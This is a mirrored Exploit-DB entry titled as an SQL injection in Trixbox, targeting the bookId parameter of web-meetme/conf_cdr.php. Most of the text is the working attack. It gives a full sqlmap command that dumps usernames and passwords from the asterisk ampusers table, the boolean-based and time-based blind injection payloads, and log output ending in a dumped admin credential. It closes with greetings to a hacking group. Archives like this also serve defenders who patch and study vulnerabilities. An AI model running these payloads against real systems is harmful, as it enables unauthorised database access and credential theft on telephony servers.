bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/32239.txt
Offensive Security 81eda5a35c Updated 03_22_2014
2014-03-22 04:31:38 +00:00

61 lines
No EOL
2.5 KiB
Text
Executable file
Raw Blame History

# Exploit Title: SQL injection in Trixbox All Versions
# Date: 13/03/2014
# Exploit Author: Sc4nX
# Email : Sec744[at]yahoo.com - r1z[at]hackermail.com
# Software Link: http://trixbox.org/downloads
# Tested on: Linux / Win 7
Example : (Grab users / password hashes from ampusers)?
root@sc4nx# python sqlmap.py -u http://localhost/web-meetme/conf_cdr.php?bookId=1 -D asterisk -T ampusers -C username,password --dump --level 4 --risk 4 --no-cast --threads 10
[*] starting at 07:53:52
[07:53:52] [INFO] resuming back-end DBMS 'mysql'
[07:53:52] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: bookId
? ? Type: boolean-based blind
? ? Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
? ? Payload: bookId=1' RLIKE (SELECT (CASE WHEN (2971=2971) THEN 1 ELSE 0x28 END)) AND 'AIdK'='AIdK
? ? Type: AND/OR time-based blind
? ? Title: MySQL < 5.0.12 AND time-based blind (heavy query)
? ? Payload: bookId=1' AND 3086=BENCHMARK(5000000,MD5(0x454a5a64)) AND 'qjLM'='qjLM
---
[07:53:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.8
web application technology: Apache 2.2.3, PHP 5.2.5
back-end DBMS: MySQL 5
[07:53:52] [INFO] fetching columns 'password, username' for table 'ampusers' in database 'asterisk'
[07:53:52] [INFO] resumed: 2
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 8
[07:53:52] [INFO] resumed: username
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 8
[07:53:52] [INFO] resumed: password
[07:53:52] [INFO] fetching entries of column(s) 'password, username' for table 'ampusers' in database 'asterisk'
[07:53:52] [INFO] fetching number of column(s) 'password, username' entries for table 'ampusers' in database 'asterisk'
[07:53:52] [INFO] resumed: 1
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 8
[07:53:52] [INFO] resumed: passw0rd
[07:53:52] [INFO] retrieving the length of query output
[07:53:52] [INFO] resumed: 5
[07:53:52] [INFO] resumed: admin
[07:53:52] [INFO] analyzing table dump for possible password hashes
Database: asterisk
Table: ampusers
[1 entry]
+----------+----------+
| username | password |
+----------+----------+
| admin ? ?| passw0rd |
+----------+----------+
===================================================================================
GZ : Dr.Hacker (Doksh) - CodeZero - All Memmbers Sec4ever.com?
The End :P
Reference in a new issue View git blame Copy permalink